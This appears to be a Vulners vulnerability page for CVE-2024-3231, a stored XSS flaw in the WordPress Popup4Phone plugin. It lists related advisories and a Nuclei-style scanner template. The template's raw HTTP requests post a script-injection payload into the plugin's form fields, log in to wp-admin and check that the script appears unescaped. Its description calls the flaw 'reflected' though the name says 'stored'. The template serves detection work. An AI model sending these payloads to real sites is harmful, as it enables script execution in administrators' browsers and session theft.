| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2024-3231 | 8 Feb 202610:45 | – | circl | |
| WordPress Plugin Popup4Phone 安全漏洞 | 17 May 202400:00 | – | cnnvd | |
| CVE-2024-3231 | 17 May 202406:00 | – | cve | |
| CVE-2024-3231 Popup4Phone <= 1.3.2 - Unauthenticated Stored XSS | 17 May 202406:00 | – | cvelist | |
| CVE-2024-3231 | 17 May 202406:15 | – | nvd | |
| CVE-2024-3231 | 17 May 202406:15 | – | osv | |
| WordPress Popup4Phone Plugin <= 1.3.2 is vulnerable to Cross Site Scripting (XSS) | 17 May 202400:00 | – | patchstack | |
| WordPress Popup4Phone plugin <= 1.3.2 - Unauthenticated Stored XSS vulnerability | 17 May 202407:06 | – | patchstack | |
| PT-2024-24498 · WordPress · Popup4Phone | 16 May 202400:00 | – | ptsecurity | |
| CVE-2024-3231 | 23 May 202508:48 | – | redhatcve |
id: CVE-2024-3231
info:
name: Popup4Phone <= 1.3.2 - Unauthenticated Stored Cross-Site Scripting
author: Shivam Kamboj
severity: medium
description: |
Popup4Phone WordPress plugin through 1.3.2 contains a reflected cross-site scripting caused by unsanitized parameters, letting unauthenticated users execute scripts in admin browsers, exploit requires sending crafted requests.
impact: |
Attackers can execute scripts in admin browsers, potentially leading to session hijacking or defacement.
remediation: |
Update to the latest version of Popup4Phone plugin.
reference:
- https://wpscan.com/vulnerability/81dbb5c0-ccdd-4af1-b2f2-71cb1b37fe93/
- https://nvd.nist.gov/vuln/detail/CVE-2024-3231
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-3231
cwe-id: CWE-79
epss-score: 0.00684
epss-percentile: 0.47916
cpe: cpe:2.3:a:ivanweb:popup4phone:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
shodan-query: http.component:"WordPress"
fofa-query: body="popup4phone"
tags: cve,cve2024,wordpress,wpscan,wp-plugin,popup4phone,xss,stored
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
popup4phone%5Bws_pages_submit_url%5D=&popup4phone%5Bws_pages_submit_title%5D=Popup4Phone&popup4phone%5Bname%5D=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&popup4phone%5Bphone%5D=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&popup4phone%5Bemail%5D=test%40test.com&popup4phone%5Bmessage%5D=test&ajax=1
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "success")'
condition: and
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, 'wordpress_logged_in')
condition: and
internal: true
- raw:
- |
GET /wp-admin/admin.php?page=popup4phone HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<script>alert(document.domain)</script>")'
condition: and
# digest: 4a0a0047304502205d1e4d3d16ee4ee4af21e3e559413710a624da367fcd977dfe74f9465cbdd0ac022100db8f357f1819ea54777d076ead46940903ce336a10c0929da5f72dc3801de9e1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation